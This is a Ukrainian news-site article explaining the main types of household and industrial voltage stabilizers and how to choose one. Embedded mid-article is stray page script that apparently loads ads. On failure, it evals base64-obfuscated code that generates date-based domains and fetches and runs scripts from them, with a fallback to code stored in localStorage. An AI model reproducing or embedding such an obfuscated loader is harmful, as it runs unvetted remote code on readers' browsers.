Види стабілізаторів напруги та їх особливості

Для правильного функціонування техніки потрібні певні умови. Серед них — стабільне електроживлення. В нинішній ситуації постійних аварійних відключень та коливань напруги гарантувати безперебійну роботу будь-якого приладу складно. В таких непростих умовах є ризик залишитися без холодильника чи комп’ютера, які можуть не витримати чергового форс-мажору. Стабілізатор — прилад, який нормалізує електроживлення та робить його максимально стабільним у випадках непередбачених чи навіть планових коливань.

Вибираємо стабілізатор: важливі питання

Щоби придбати стабілізатор, потрібно розуміти, які навантаження передбачаються. Аналізувати, з якими проблемами доведеться боротися. Адже напруга може бути як надто висока, так і занизька.

Варто звертати увагу також на фазність. Побутові прилади працюють від однофазної мережі. Для насосів потрібні трифазні варіанти захисту.

Якщо мова йде про приватний будинок чи промислове підприємство, можна купити стабілізатор стаціонарний. Для нього слід знайти місце з добрим вентилюванням повітря. Або ж віддати перевагу портативному варіанту для квартири чи будинку. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Види вирівнювачів напруги залежно від типу стабілізації

Розрізняють чотири види стабілізаторів. Вони мають різний принцип роботи та швидкодію. Відповідно — іншими є показники довговічності, точності. Також різниться ціна.

Стабілізатори бувають:

Релейні — найбільш доступні за вартістю. Напруга стабілізується за рахунок підключення замиканням реле додаткових обмоток автоматичного трансформатора. Серед плюсів — недорогий ремонт. Мінус — невисока точність та шумність роботи. Сфера використання — побутові умови з малопотужними приладами. Симісторні або тиристорні — схожі за принципом роботи до релейних за винятком того, що тут немає механіки. За рахунок цього вони працюють тихіше. Проте параметр точності вихідного значення напруги не суттєво відрізняється від того, який обіцяють релейні прилади. А от ціна вища.Сервопривідні — працюють за принципом реостату. Головна роль відведена електродвигуну, який пересуває силові контакти на потрібну обмотку трансформатора. Результат — плавне досягнення потрібних значень напруги. Недолік — прилад не варто використовувати в умовах надто частих і критичних коливань, бо може постраждати електродвигун. Ферорезонансні або електромагнітні — найбільш точні стабілізатори, які при цьому не підходять для побутового використання. Причина — залежність вирівнювання коливань від рівня навантаження. Також вони дають певне магнітне випромінювання, що не дозволяє використовувати їх для звукової апаратури.

Вибирати стабілізатор потрібно з розумінням ключової термінології або ж звернувшись за консультацією до менеджерів магазину. Бо лише правильно підібраний прилад зможе надійно працювати і захищати техніку від перепадів напруги. (adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/vidi-stabilizatoriv-naprugi-ta-i-h-osoblivosti/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top